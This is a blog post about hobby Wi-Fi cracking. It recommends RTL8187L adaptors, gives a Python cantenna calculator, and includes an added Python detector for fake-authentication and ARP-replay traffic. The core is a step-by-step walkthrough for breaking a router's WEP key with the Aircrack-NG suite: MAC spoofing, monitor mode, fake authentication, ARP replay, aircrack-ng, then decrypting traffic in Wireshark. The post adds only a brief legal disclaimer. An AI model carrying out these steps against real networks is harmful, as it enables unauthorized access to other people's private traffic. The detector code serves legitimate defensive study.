I thought why not shed some light on the tools that I have been using to play with the Wi-Fi networks around me. Hopefully, we can gather a collective discussion on what works and what does not, and perhaps some interesting ideas for future Wi-Fi projects.
Max and I have been toying with 802.11 networks since early this year. We have tested and tried a number of antennas, network adaptors and certain methods to “crack” WEP and WPA. The objective is to decipher and read the data that is up in the air.
For starters, here is a set of software / tools that I used.
OS: Backtrack 4, Ubuntu 10.04.
Tools: Aircrack-NG suite, Wireshark and WiFiZoo
Wireshark and WiFiZoo are basically network packet analysers that help you make sense of the stream of data being fed to you in real time. Both have a great GUI, so I do not foresee any problems with using them. Plus, they come pre-installed in Backtrack 4. What one should look out for is mastering the Aircrack-NG suite. What you need to know is that it ONLY works fully with certain Wi-Fi cards. Some Wi-Fi cards will not be detected by the Aircrack-NG suite at all, while others will have only partial functions available (a common example is a card that can passively collect data only and cannot inject packets into the air). What you need to do is to MAKE SURE you get a proper Wi-Fi adaptor card with the correct chipset before you begin cracking or sniffing. You can get the supported list of cards and chipsets here.
Adaptors & Antennas
This brings us to the fun part, Adaptors and Antennas, perhaps also the hardest and most rewarding part of all. To cut a long story short on the numerous hair-tearing sessions we had to go through finding the “Chosen One”, Max and I finally arrived at two commercially available adaptors that work perfectly with the Aircrack-NG suite. They are the AWUS036H and the UBDo-gt.
The reason for these two is simple: their chipset (RTL8187L) is supported, and they are cost effective for their given specifications. The only difference between the two lies in the antenna. The AWUS036H comes with an omni-directional antenna, while the UBDo-gt comes with a directional antenna of 12 dBi gain.
The choice between an omni-directional and a directional antenna matters for the application. One would use an omni-directional antenna first when doing reconnaissance on the networks around the vicinity, and then a directional antenna to lock on to your target. Once you know where to point it, you can move further away from your target without compromising signal strength and quality.
Unfortunately, directional antennas do not come cheap. Take the UBDo-gt for example: because of the antenna it costs about 30–40 SGD more than the AWUS036H, and standalone external antennas cost up to 70–90 SGD for about the same 12 dBi gain. The good news is that making your own antenna can be really cheap and simple. I have made a Cantenna on my own using a “Longan Fruit” can and it gives me about 8–12 dBi gain. I relied on this website to do the calculations I needed to build my Cantenna.
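The calculations a Cantenna calculator does are the standard circular-waveguide ones, and they are worth seeing written out, because the can diameter decides whether the antenna works at 2.4 GHz at all. The following is an added example and is not the calculator from the website referred to above: it treats the can as a circular waveguide, uses the TE11 and TM01 cutoff wavelengths (1.706 D and 1.306 D), derives the guide wavelength, and places the feed probe a quarter guide wavelength from the closed end. The 92 mm diameter is a constructed sample value, not a measurement of the author's can.

```python
import math

C = 299_792_458.0  # speed of light in m/s


def cutoff_frequencies(diameter_m):
    """Lower (TE11) and upper (TM01) cutoff frequencies of a circular
    waveguide of the given inner diameter, in Hz.  Between these two the
    can carries only the dominant mode, which is what a Cantenna needs."""
    lower = C / (1.706 * diameter_m)
    upper = C / (1.306 * diameter_m)
    return lower, upper


def in_band(diameter_m, freq_hz=2.442e9):
    """True if the operating frequency (default: channel 7, the middle of
    the 2.4 GHz band) falls between the two cutoff frequencies."""
    lower, upper = cutoff_frequencies(diameter_m)
    return lower < freq_hz < upper


def cantenna_dimensions(diameter_m, freq_hz=2.442e9):
    """Feed-probe placement for a can of the given inner diameter.

    lam0  : free-space wavelength
    lam_c : TE11 cutoff wavelength (1.706 * D)
    lam_g : guide wavelength, lam0 / sqrt(1 - (lam0 / lam_c)^2)

    The probe sits lam_g / 4 from the closed end and is lam0 / 4 long; the
    can should be at least 3/4 lam_g long so the open end radiates cleanly.
    """
    lam0 = C / freq_hz
    lam_c = 1.706 * diameter_m
    if lam0 >= lam_c:
        raise ValueError("can too narrow: frequency is below the TE11 cutoff")
    lam_g = lam0 / math.sqrt(1.0 - (lam0 / lam_c) ** 2)
    return {
        "guide_wavelength_m": lam_g,
        "probe_position_m": lam_g / 4.0,
        "probe_length_m": lam0 / 4.0,
        "min_can_length_m": 0.75 * lam_g,
    }


if __name__ == "__main__":
    # Constructed sample: a 92 mm inner-diameter can, roughly a large food can.
    for d in (0.092, 0.100):
        lo, hi = cutoff_frequencies(d)
        print(f"D={d*1000:.0f} mm  cutoffs {lo/1e9:.3f}-{hi/1e9:.3f} GHz  "
              f"usable at 2.4 GHz: {in_band(d)}")
    dims = cantenna_dimensions(0.092)
    for name, value in dims.items():
        print(f"  {name}: {value*1000:.1f} mm")
```

Run it and the 92 mm can comes out usable (cutoffs at about 1.91 and 2.50 GHz, probe about 49 mm from the closed end and about 31 mm long), while a 100 mm can has its upper cutoff below 2.44 GHz, which is why a can that looks "about right" can still give poor gain.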
Basic steps to get you cracking WEP (for ScriptKiddies)
Once you have got your tools ready it is time to get cracking. Routers, especially those given out by our local ISP, have their default security settings set to WEP to encrypt their traffic. This can be cracked easily with the Aircrack-NG suite in about 5 minutes once you are “au fait” with the setup.
For those who want to jump straight into the cracking process here are the basic steps you need to take:
Step 0: Spoof MAC address
sudo ifconfig <attacker’s wlan interface> hw ether <desired MAC address>
Step 1: Gather essential background data about yourself and your target.
target_router SSID -> target_router
target_router MAC address -> 00:14:7F:99:EB:99
target router channel-> 6
attacker’s MAC address -> 00:0f:b5:ff:ff:f9
attacker’s wlan interface: wlan0
attacker’s monitoring interface name (spawned from wlan0): mon0
Note: Replace the above variables with your own. These were mine for my setup.
Step 2: Using Aircrack-NG suite to crack WEP
sudo airmon-ng start wlan0 -> spawn a monitoring interface (mon0) from wlan0.
sudo airodump-ng mon0 -> survey / scan for your target router.
sudo airmon-ng stop mon0 -> stop the monitoring interface so that you can start it again listening on channel 6 only.
sudo airmon-ng start wlan0 6 -> this starts the mon0 interface listening on channel 6 only [important step!].
sudo airodump-ng -c 6 -w outputfile mon0 -> write the captured frames to a file called outputfile-01.cap.
sudo aireplay-ng -1 1 -e target_router -a 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0 -> this sends a single fake-authentication request every 1 second so the router keeps generating IVs. [open in a separate terminal]
sudo aireplay-ng -3 -b 00:14:7F:99:EB:99 -h 00:0f:b5:ff:ff:f9 mon0 -> launch as many of these ARP replays as you need to generate IV packets quickly. [open in a separate terminal]
sudo aircrack-ng outputfile-01.cap
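The two aireplay-ng steps above leave a very distinctive footprint on the air: one station authenticating to the same BSSID once a second for minutes, and a flood of identical-length data frames from that station. That is what the owner of the router (or a wireless IDS) can look for. The following is an added example, not part of the original post or of the Aircrack-NG suite: a small detector that runs over a constructed list of frame records (timestamp, frame kind, source MAC, BSSID, length) and flags stations showing either pattern. The record layout and every MAC except the page's example router address are constructed for the example.

```python
from collections import defaultdict

# Constructed frame records: (timestamp_s, kind, source_mac, bssid, length).
# Real captures would come from airodump-ng / Wireshark; this layout is
# invented for the example.
ROUTER = "00:14:7f:99:eb:99"        # the router used as the example above
LEGIT = "aa:bb:cc:00:00:01"         # constructed: a normal client
NOISY = "de:ad:be:ef:00:01"         # constructed: a station behaving like aireplay-ng


def build_constructed_frames():
    frames = []
    # A normal client: one authentication, one association, varied traffic.
    frames.append((0.0, "auth", LEGIT, ROUTER, 30))
    frames.append((0.1, "assoc_req", LEGIT, ROUTER, 60))
    for i in range(40):
        frames.append((1.0 + i * 0.5, "data", LEGIT, ROUTER, 100 + i * 7))
    # A noisy station: fake-auth once per second for 20 s ...
    for i in range(20):
        frames.append((10.0 + i, "auth", NOISY, ROUTER, 30))
    # ... and 300 same-size (ARP-sized) data frames within 3 seconds.
    for i in range(300):
        frames.append((15.0 + i * 0.01, "data", NOISY, ROUTER, 68))
    return frames


def _burst_sources(events, window_s, threshold):
    """events maps a key to a list of timestamps.  Return the keys that have
    at least `threshold` events inside any sliding window of `window_s`."""
    flagged = set()
    for key, times in events.items():
        times = sorted(times)
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window_s:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(key)
                break
    return flagged


def auth_flood_sources(frames, window_s=30.0, threshold=5):
    """Stations that authenticate repeatedly to one BSSID: a real client
    authenticates once, a fake-auth loop does it every few seconds."""
    events = defaultdict(list)
    for ts, kind, src, bssid, _ in frames:
        if kind == "auth":
            events[(src, bssid)].append(ts)
    return {src for src, _ in _burst_sources(events, window_s, threshold)}


def replay_sources(frames, window_s=5.0, threshold=100):
    """Stations sending a burst of data frames of one identical length to a
    BSSID, the signature of a replayed packet rather than real traffic."""
    events = defaultdict(list)
    for ts, kind, src, bssid, length in frames:
        if kind == "data":
            events[(src, bssid, length)].append(ts)
    return {src for src, _, _ in _burst_sources(events, window_s, threshold)}


def analyse_frames(frames):
    return {
        "auth_flood": sorted(auth_flood_sources(frames)),
        "replay": sorted(replay_sources(frames)),
    }


if __name__ == "__main__":
    result = analyse_frames(build_constructed_frames())
    print("authentication flood from:", result["auth_flood"])
    print("replayed frames from     :", result["replay"])
```

The thresholds (5 authentications in 30 s, 100 equal-length frames in 5 s) are starting points, not tuned values; the point is that both patterns are far outside what a normal client does, so even a coarse rule separates them. Raising the threshold does not hide the replay step, because generating enough IVs for aircrack-ng needs tens of thousands of such frames.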
Step 3 (Optional): Monitor network traffic in real time
Open up Wireshark > Edit > Preferences > Enter WEP key into the appropriate fields
Disclaimer: Unauthorised access to your neighbours’ network or any other network other than your own is an offence in Singapore. Crack at your own risk!
Finally, experiment as much as you can without getting into trouble with the law, because it is a fun process and it need not be a painful one. Please comment and leave your thoughts below. Let us know if you have a Wi-Fi project in mind that you want to try out, or one you want to share. I look forward to your response.